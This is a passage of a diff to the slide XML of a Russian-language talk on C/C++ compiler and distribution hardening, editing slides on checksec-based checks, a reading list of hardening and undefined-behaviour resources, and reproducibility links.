-              <a:t>), Stack Clashing, Safe Stack, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32674,7 +32665,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF60EB6-4D51-481C-9223-8D6829AF904C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32701,7 +32692,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780015"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3093752828"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -32733,7 +32724,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32751,7 +32742,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что почитать </a:t>
+              <a:t>Что стоит сделать </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -32765,7 +32756,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32783,113 +32774,103 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Примеры атак</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
+              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Поиск проблемных программ (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>можно автоматизировать с помощью </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Nightmare</a:t>
+              <a:t>утилиты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>checksec</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Руководства по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Может проверить наличие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>noexecstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Linux Hardening Guide</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статьи </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>John </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Regehr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>UB</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId7"/>
-              </a:rPr>
-              <a:t>UB in 2017</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(?) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддерживает более новые защиты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: CFI (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>все виды</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), Stack Clashing, Safe Stack, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -32899,7 +32880,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32926,7 +32907,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780015"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -32958,7 +32939,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32976,9 +32957,12 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание !</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Что почитать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32987,7 +32971,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33005,7 +32989,20 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Полная версия слайдов доступна по адресу</a:t>
+              <a:t>Примеры атак</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Nightmare</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33013,72 +33010,102 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Руководства по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Linux Hardening Guide</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статьи </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>John </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Regehr</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> </a:t>
             </a:r>
-          </a:p>
-          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>UB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId7"/>
+              </a:rPr>
+              <a:t>UB in 2017</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4048685" y="2932580"/>
-            <a:ext cx="2857500" cy="2857500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33105,7 +33132,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33137,7 +33164,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33155,7 +33182,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Приложения</a:t>
+              <a:t>Спасибо за внимание !</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33163,10 +33190,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33174,7 +33201,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -33182,16 +33209,82 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Полная версия слайдов доступна по адресу</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4048685" y="2932580"/>
+            <a:ext cx="2857500" cy="2857500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33218,7 +33311,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33250,7 +33343,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33268,7 +33361,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Воспроизведение результатов</a:t>
+              <a:t>Приложения</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33276,10 +33369,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
+          <p:cNvPr id="3" name="Text Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33287,188 +33380,15 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:ph type="body" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии дистрибутивов</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверялись последние </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>стабильные</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> версии</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии браузеров</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>b0ca903b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>d0273f3d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Замеры производительности </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Подсчёт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> CVE/KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-метрик</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33477,7 +33397,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33504,7 +33424,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
